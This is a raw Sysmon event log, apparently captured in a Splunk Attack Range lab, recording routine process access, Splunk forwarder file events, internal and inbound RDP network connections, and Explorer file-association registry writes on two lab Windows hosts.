09:26:45.908{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:45.908{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:45.908{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:45.908{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:45.908{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:46.773{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8652A7264DF44E25F9DEA061ABA6E56D,SHA256=BE8B11C0081D62EE48A65AD8051AF326609EB84E02BD45A2B262E96D83AFECAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:46.908{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C889CE4AAE2380735ABD3857F6D87FBD,SHA256=0C823507F258FAA759546EA16C2D3DF274D70ACACA5C2A6718222C8CA6D581E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:46.033{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECBD29C9E6E9D0F34F3238FE793BD1C8,SHA256=37A914FD48461AA84292DF643CF05A8E30A80FE8F128AC89B3137AB1671128C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:47.992{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2D67F6873C10472055F86B3B11603B,SHA256=17F6D968B81FBC8F0A6EE2AF8629B88B8FB7A366245D727C5FFAE1B7F768F399,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:45.099{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54298-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:47.174{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A1867201819DC90AEA821395DE5A29BB,SHA256=CF5497AC3D479CBE6B7385D0B1E217250BBFC6E08B6BD0518462A281D6904D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:47.174{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DAA5F07AC27FB4D3BE98AECB7B565158,SHA256=243E407BD82E5D3DAC224D0EDA1AA84F770AD64DDFC04BE51E2411AD0E6E05F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:47.096{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D551ADA330B7613D82BE56868F99B73E,SHA256=6F1AC4B288DD2FC56D6A92D8BF6A671252D4EC29482B44B273CBF8FC56745C0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:44.486{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de62824-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:43.833{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59575-false10.0.1.12-8000- 23542300x8000000000000000981900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:47.133{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA679ABD917DD58D26C16C8BEC3B77B8,SHA256=2A48AA6055D2CC3B73CDDA30A90065C8CCACEA6F1C9BFB4A5386B3BA82B46002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:47.133{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17FBC3C62988F516799387C105DC0EA4,SHA256=CE143F4E6E3639CCA33E83DEB8A62AF2CEE33FAF543FAD606737CA173A92F548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:48.768{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0FC0C6B286EBE257E7419710A02EA55,SHA256=45387C8F3C4E3E365DF4F9B17DADFC76F80D102658B13E96CC5A83CDEF70C618,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:47.030{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55831-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:48.158{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C45BE6B6AE45ED8FD909107F2F84DA,SHA256=6588035C7D18E5D16924575F70D168A4F06F819889B8121915AA85AF962587B0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001057548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:26:49.471{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids\txtfileBinary Data 354300x80000000000000001057547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:47.364{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56056-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 13241300x80000000000000001057546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:26:49.455{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gitmodules\OpenWithProgids\txtfileBinary Data 13241300x80000000000000001057545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:26:49.455{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gitignore\OpenWithProgids\txtfileBinary Data 13241300x80000000000000001057544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:26:49.455{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gitattributes\OpenWithProgids\txtfileBinary Data 13241300x80000000000000001057543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1042SetValue2021-09-27 09:26:49.455{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 23542300x80000000000000001057542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:49.176{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC54B6140A0A8A758121FB7BB27C60B0,SHA256=4EF2C8E0561A8FEF565CC802382846C88853DD3FA51B14398775FEDDF2B5E37E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:49.695{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA679ABD917DD58D26C16C8BEC3B77B8,SHA256=2A48AA6055D2CC3B73CDDA30A90065C8CCACEA6F1C9BFB4A5386B3BA82B46002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:49.164{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F92CBFAB81E2841F83723D53864410,SHA256=B826A692D24D4FA85C86C9AF6343800DE8F3A852E970544DDCFD978F9EE63FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:50.190{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D02F3550D6C46AB7A490BFE1A133480,SHA256=03642BB1C015B60FBE1DB5F0E3E12261DBE276C39CEEC7F7D563BD9460534B7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:50.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41F2650B3FDB11A7F6AFAF1EE143E290,SHA256=CCFFF1EC53D3F45DDA9F9A22546E3DF90257259247EBD1B3E3C0E9F6BBDD3613,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:46.962{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56597-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:51.268{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC73766E3AC9EF782CDBABBAB3508F61,SHA256=C240AD7DF7376F86B0CC3FB2321EE75C512B218E8B1AF7F99C7BF6E8D4C0B99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:51.508{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7ED46356227A209F75FEE0F7E1A2C8C,SHA256=0A852B0888A235A0876897EB0BF6AD36FE7E9BA74592843B2B913AAFC7304FD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:47.815{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54276-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:52.523{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68CB0B54D65CE11CFE5A04D5D1D15105,SHA256=71F69F6BED1B429F0E88A043FE6277E22953EB9BC5242802FB7DA9896F550122,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:51.037{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54299-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:52.268{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28F51CD5B85823E5FE4CF5CD029F4C23,SHA256=3EBDE5C30B8FA178B16073565A00E3027C4EB44556B3CE3A04A2A30884C6A8B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:49.723{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59576-false10.0.1.12-8000- 23542300x8000000000000000981912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:53.759{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB9D74BB3FB621D2066F59E465A1FED8,SHA256=2E3237376EAB326589BB78DA03C25F4E93EFFC65CE52AA7A21AC801032FBF8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:53.268{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0822EC6EB7C9904BD1E78AD4196FA8A8,SHA256=444D5EA407296BBB4C886D9BBF54ED969466D667B1912750CAA3B2259ABC27D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:54.775{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=969944F7B2DBA4954244C1180003F38E,SHA256=424E60EDB5B18FCDC46073FD416D23DC640304777457522F9AA1F37EE0347457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:54.315{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3485A43DF01C31A6254141654682DCD7,SHA256=66B07B0A3BE8F3251CF637EC748C689D3C0E7F86C78614CE5092383C027E3FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:55.884{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C885AE69E2A345C491106211F5960A75,SHA256=F881051B98749FE6B8F2842987C54C7C1DA2A75515CEE8AC914DB8CF65A8362B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:53.904{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58349-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:55.537{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B801CBE55C332F25BA3B6E7030E3A7E6,SHA256=12B9FB2F1542C7F0827FD6E0A95FA028B03BF8C0D1886A4DB3AEEBA8FA324E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:55.283{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=255F4A6A860424EEAAF2562C8634257F,SHA256=03C49B1B1B77D16C363303DBDCD9894CA8C51E3021C134B33757A28B0C20E46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:55.283{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE2F4A19AB00274808C1C4B13E84A667,SHA256=C57393EEC0869A003DD4210F88DA850366F64BFF79DDED1D1DBF37E25D62888A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:56.900{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06D7B8A760F412CA6F888267727E102,SHA256=F20D5E947B014AF5D5324104FE2B63B78DDED7A51FDCEB6509245408D81EA608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:56.705{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFE31055D9CD5406AE597E1854D8C610,SHA256=842905C9C5026F8B3895BC13F1A1578E7A98D105225198CA7884F0C1438FA115,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:53.281{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT 